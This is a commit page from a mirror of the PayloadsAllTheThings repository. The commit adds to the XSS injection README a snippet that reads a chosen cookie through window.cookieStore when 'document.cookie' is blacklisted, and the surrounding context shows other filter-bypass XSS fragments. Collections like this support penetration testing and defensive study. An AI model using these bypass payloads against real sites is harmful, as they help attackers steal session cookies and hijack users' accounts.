ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-02-20 13:46:05 +00:00
Code Issues Actions 1 Packages Projects Releases Wiki Activity

Added document.cookie blacklist bypass

Browse Source 
Added an alternative to document.cookie for situations when this text is blacklisted.
This commit is contained in:
Cory Cline 2022-10-13 18:23:36 -05:00 committed by GitHub
parent 6479c3a400
commit 5d561ea7d6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
XSS Injection/README.md
View File

@ -54,6 +54,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
- [Bypass space filter](#bypass-space-filter)
- [Bypass email filter](#bypass-email-filter)
- [Bypass document blacklist](#bypass-document-blacklist)
- [Bypass document.cookie blacklist](#bypass-document.cookie-blacklist)
- [Bypass using javascript inside a string](#bypass-using-javascript-inside-a-string)
- [Bypass using an alternate way to redirect](#bypass-using-an-alternate-way-to-redirect)
- [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert)
@ -774,6 +775,14 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
window["doc"+"ument"]
```
### Bypass document.cookie blacklist
This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements.
```
const cookiePromise=Promise.resolve(window.cookieStore.get('COOKIE NAME')).then((cookieValue)=>{console.log(cookieValue.value);});
```
### Bypass using javascript inside a string
```javascript